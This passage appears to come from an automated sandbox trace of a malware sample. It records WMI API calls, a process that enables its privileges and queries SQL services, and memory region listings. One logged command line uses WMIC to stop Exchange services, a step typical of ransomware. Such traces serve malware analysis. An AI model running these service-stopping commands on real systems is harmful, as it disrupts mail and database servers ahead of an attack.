returned 0xc2f1e4 [0104.803] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0104.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x10c8a70, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0104.803] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0104.803] SysStringLen (param_1="SERVICE") returned 0x7 [0104.803] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0104.803] SysStringLen (param_1="'") returned 0x1 [0104.803] IWbemServices:GetObject (in: This=0xe701d8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xc2f1c0*=0x0, ppCallResult=0x0 | out: ppObject=0xc2f1c0*=0xe95588, ppCallResult=0x0) returned 0x0 [0104.807] lstrlenW (lpString="CALL") returned 4 [0104.807] lstrlenW (lpString="CALL") returned 4 [0104.807] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0104.807] IWbemClassObject:Get (in: This=0xe95588, wszName="Verbs", lFlags=0, pVal=0xc2f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f178*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe7ecd0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xe7eae0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.808] SafeArrayGetLBound (in: psa=0xe7ecd0, nDim=0x1, plLbound=0xc2f188 | out: plLbound=0xc2f188) returned 0x0 [0104.808] SafeArrayGetUBound (in: psa=0xe7ecd0, nDim=0x1, plUbound=0xc2f190 | out: plUbound=0xc2f190) returned 0x0 [0104.808] SafeArrayGetElement (in: psa=0xe7ecd0, rgIndices=0xc2f198, pv=0xc2f1cc | out: pv=0xc2f1cc) returned 0x0 [0104.808] IWbemClassObject:Get (in: This=0xe96f50, wszName="Name", lFlags=0, pVal=0xc2f168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.808] lstrlenW (lpString="StartService") returned 12 [0104.808] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0104.809] IUnknown:Release (This=0xe96f50) returned 0x1 [0104.809] SafeArrayGetElement (in: psa=0xe7ecd0, rgIndices=0xc2f198, pv=0xc2f1cc | out: pv=0xc2f1cc) returned 0x0 [0104.809] IWbemClassObject:Get (in: This=0xe97480, wszName="Name", lFlags=0, pVal=0xc2f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.809] lstrlenW (lpString="StopService") returned 11 [0104.809] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0104.809] GetCurrentThreadId () returned 0xc90 [0104.809] ??0CHString@@QAE@XZ () returned 0xc2efe4 [0104.809] IWbemClassObject:Get (in: This=0xe97480, wszName="Description", lFlags=0, pVal=0xc2efb4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2efb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.809] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.809] IWbemClassObject:Get (in: This=0xe97480, wszName="Parameters", lFlags=0, pVal=0xc2f158*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f158*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.809] IWbemClassObject:Get (in: This=0xe97480, wszName="VerbType", lFlags=0, pVal=0xc2f0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f0f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.809] IWbemClassObject:Get (in: This=0xe97480, wszName="Derivation", lFlags=0, pVal=0xc2f0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f0d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.809] lstrlenW (lpString="StopService") returned 11 [0104.809] lstrlenW (lpString="StopService") returned 11 [0104.810] IUnknown:Release (This=0xe97480) returned 0x1 [0104.810] IUnknown:Release (This=0xe95588) returned 0x0 [0104.810] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.810] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.811] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.811] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd44fbbb3 | out: _String="Select", _Context=0xd44fbbb3) returned="Select" [0104.811] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fbbb3 | out: _String=0x0, _Context=0xd44fbbb3) returned="*" [0104.811] lstrlenW (lpString="FROM") returned 4 [0104.811] lstrlenW (lpString="*") returned 1 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0104.811] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fbbb3 | out: _String=0x0, _Context=0xd44fbbb3) returned="from" [0104.811] lstrlenW (lpString="FROM") returned 4 [0104.811] lstrlenW (lpString="from") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0104.811] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fbbb3 | out: _String=0x0, _Context=0xd44fbbb3) returned="Win32_Service" [0104.811] lstrlenW (lpString="SET") returned 3 [0104.811] lstrlenW (lpString="CALL") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0104.811] lstrlenW (lpString="CREATE") returned 6 [0104.811] lstrlenW (lpString="CALL") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0104.811] lstrlenW (lpString="GET") returned 3 [0104.811] lstrlenW (lpString="CALL") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0104.811] lstrlenW (lpString="LIST") returned 4 [0104.811] lstrlenW (lpString="CALL") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0104.811] lstrlenW (lpString="ASSOC") returned 5 [0104.811] lstrlenW (lpString="CALL") returned 4 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0104.811] WbemLocator:IUnknown:AddRef (This=0xe46d50) returned 0x3 [0104.811] lstrlenW (lpString="") returned 0 [0104.811] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0104.811] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.811] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.811] GetCurrentThreadId () returned 0xc90 [0104.812] GetCurrentProcess () returned 0xffffffff [0104.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xc2fae8 | out: TokenHandle=0xc2fae8*=0x270) returned 1 [0104.812] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xc2fae4 | out: TokenInformation=0x0, ReturnLength=0xc2fae4) returned 0 [0104.812] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x10c8ba0, TokenInformationLength=0x118, ReturnLength=0xc2fae4 | out: TokenInformation=0x10c8ba0, ReturnLength=0xc2fae4) returned 1 [0104.812] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x10c8ba0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0104.812] CloseHandle (hObject=0x270) returned 1 [0104.812] lstrlenW (lpString="GET") returned 3 [0104.812] lstrlenW (lpString="CALL") returned 4 [0104.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0104.812] lstrlenW (lpString="LIST") returned 4 [0104.812] lstrlenW (lpString="CALL") returned 4 [0104.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0104.812] lstrlenW (lpString="SET") returned 3 [0104.812] lstrlenW (lpString="CALL") returned 4 [0104.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0104.812] lstrlenW (lpString="CALL") returned 4 [0104.812] lstrlenW (lpString="CALL") returned 4 [0104.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0104.812] ??0CHString@@QAE@XZ () returned 0xc2faa8 [0104.812] GetCurrentThreadId () returned 0xc90 [0104.812] SysStringLen (param_1="\\\\") returned 0x2 [0104.812] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0104.812] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0104.812] SysStringLen (param_1="\\") returned 0x1 [0104.812] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0104.812] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0104.813] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe46d50, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xe70318) returned 0x0 [0104.818] CoSetProxyBlanket (pProxy=0xe70318, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0104.818] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.818] ??0CHString@@QAE@XZ () returned 0xc2faa4 [0104.818] GetCurrentThreadId () returned 0xc90 [0104.819] lstrlenA (lpString="") returned 0 [0104.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x10c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.819] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.819] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.819] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd44fb8d7 | out: _String="Select", _Context=0xd44fb8d7) returned="Select" [0104.819] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb8d7 | out: _String=0x0, _Context=0xd44fb8d7) returned="*" [0104.819] lstrlenW (lpString="FROM") returned 4 [0104.819] lstrlenW (lpString="*") returned 1 [0104.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0104.819] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb8d7 | out: _String=0x0, _Context=0xd44fb8d7) returned="from" [0104.819] lstrlenW (lpString="FROM") returned 4 [0104.819] lstrlenW (lpString="from") returned 4 [0104.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0104.819] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb8d7 | out: _String=0x0, _Context=0xd44fb8d7) returned="Win32_Service" [0104.819] IWbemServices:GetObject (in: This=0xe70318, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xc2fa7c*=0x0, ppCallResult=0x0 | out: ppObject=0xc2fa7c*=0xecac30, ppCallResult=0x0) returned 0x0 [0104.846] IWbemClassObject:GetMethod (in: This=0xecac30, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xc2fa88, ppOutSignature=0xc2fa74 | out: ppInSignature=0xc2fa88*=0x0, ppOutSignature=0xc2fa74*=0xecafb0) returned 0x0 [0104.847] IUnknown:Release (This=0xecafb0) returned 0x0 [0104.847] IUnknown:Release (This=0xecac30) returned 0x0 [0104.848] ??0CHString@@QAE@XZ () returned 0xc2f954 [0104.848] GetCurrentThreadId () returned 0xc90 [0104.848] lstrlenA (lpString="") returned 0 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x10c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.848] lstrlenA (lpString="") returned 0 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x10c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.848] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.848] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.848] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd44fb85f | out: _String="Select", _Context=0xd44fb85f) returned="Select" [0104.848] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb85f | out: _String=0x0, _Context=0xd44fb85f) returned="*" [0104.848] lstrlenW (lpString="FROM") returned 4 [0104.848] lstrlenW (lpString="*") returned 1 [0104.848] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0104.848] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb85f | out: _String=0x0, _Context=0xd44fb85f) returned="from" [0104.848] lstrlenW (lpString="FROM") returned 4 [0104.848] lstrlenW (lpString="from") returned 4 [0104.848] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0104.848] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd44fb85f | out: _String=0x0, _Context=0xd44fb85f) returned="Win32_Service" [0104.848] lstrlenA (lpString="SELECT * FROM ") returned 14 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x10c8fe8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0104.848] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0104.848] SysStringLen (param_1="Win32_Service") returned 0xd [0104.848] lstrlenA (lpString=" WHERE ") returned 7 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x10c8be8, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0104.849] SysStringLen (param_1=" WHERE ") returned 0x7 [0104.849] SysStringLen (param_1="caption LIKE '%SQL%'") returned 0x14 [0104.849] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0104.849] SysStringLen (param_1=" WHERE caption LIKE '%SQL%'") returned 0x1b [0104.849] IWbemServices:ExecQuery (in: This=0xe70318, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SQL%'", lFlags=48, pCtx=0x0, ppEnum=0xc2f95c | out: ppEnum=0xc2f95c*=0xe98228) returned 0x0 [0104.870] CoSetProxyBlanket (pProxy=0xe98228, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0104.914] IEnumWbemClassObject:Next (in: This=0xe98228, lTimeout=-1, uCount=0x1, apObjects=0xc2f960, puReturned=0xc2f94c | out: apObjects=0xc2f960*=0x0, puReturned=0xc2f94c*=0x0) returned 0x1 [0105.275] IUnknown:Release (This=0xe98228) returned 0x0 [0105.276] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.276] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.276] GetCurrentThreadId () returned 0xc90 [0105.276] ??0CHString@@QAE@PBG@Z () returned 0xc2fb18 [0105.276] ??YCHString@@QAEABV0@PBG@Z () returned 0xc2fb18 [0105.276] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x10c9040, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0105.276] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0105.276] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x10c8a80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0105.276] __iob_func () returned 0x77ac1208 [0105.277] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0105.277] __iob_func () returned 0x77ac1208 [0105.277] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0105.277] ??1CHString@@QAE@XZ () returned 0x1 [0105.277] IUnknown:Release (This=0xe70318) returned 0x0 [0105.278] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0105.278] _kbhit () returned 0x0 [0105.279] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0105.279] WbemLocator:IUnknown:Release (This=0xe46d50) returned 0x2 [0105.279] IUnknown:Release (This=0xe703b8) returned 0x0 [0105.279] IUnknown:Release (This=0xe701d8) returned 0x0 [0105.280] WbemLocator:IUnknown:Release (This=0xe46d50) returned 0x1 [0105.280] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0105.280] WbemLocator:IUnknown:Release (This=0xe46d50) returned 0x0 [0105.281] CoUninitialize () [0105.296] exit (_Code=0) [0105.296] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.296] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 148 os_tid = 0xc98 Thread: id = 149 os_tid = 0xc9c Thread: id = 150 os_tid = 0xca0 Thread: id = 151 os_tid = 0xca4 Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x44fa7000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1883 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1884 start_va = 0xf10000 end_va = 0x4f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 1885 start_va = 0x4f10000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 1886 start_va = 0x4f30000 end_va = 0x4f31fff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 1887 start_va = 0x4f40000 end_va = 0x4f53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f40000" filename = "" Region: id = 1888 start_va = 0x4f60000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 1889 start_va = 0x4fa0000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 1890 start_va = 0x50a0000 end_va = 0x50a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050a0000" filename = "" Region: id = 1891 start_va = 0x50b0000 end_va = 0x50b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 1892 start_va = 0x50c0000 end_va = 0x50c1fff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 1893 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1894 start_va = 0x7e690000 end_va = 0x7e6b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e690000" filename = "" Region: id = 1895 start_va = 0x7e6b8000 end_va = 0x7e6bafff entry_point = 0x0 region_type = private name = "private_0x000000007e6b8000" filename = "" Region: id = 1896 start_va = 0x7e6bb000 end_va = 0x7e6bbfff entry_point = 0x0 region_type = private name = "private_0x000000007e6bb000" filename = "" Region: id = 1897 start_va = 0x7e6be000 end_va = 0x7e6befff entry_point = 0x0 region_type = private name = "private_0x000000007e6be000" filename = "" Region: id = 1898 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1899 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1900 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1901 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1902 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1903 start_va = 0x51a0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 1904 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1905 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1906 start_va = 0x52e0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 1907 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1948 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f10000" filename = "" Region: id = 1949 start_va = 0x4f20000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 1950 start_va = 0x50d0000 end_va = 0x518dfff entry_point = 0x50d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1951 start_va = 0x51b0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 1952 start_va = 0x53e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 1953 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1954 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1955 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1956 start_va = 0x7e590000 end_va = 0x7e68ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e590000" filename = "" Region: id = 1957 start_va = 0x7e6b5000 end_va = 0x7e6b7fff entry_point = 0x0 region_type = private name = "private_0x000000007e6b5000" filename = "" Region: id = 1958 start_va = 0x4f30000 end_va = 0x4f33fff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 1959 start_va = 0x5190000 end_va = 0x5193fff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1960 start_va = 0x54e0000 end_va = 0x5816fff entry_point = 0x54e0000 region_type = mapped_file name = 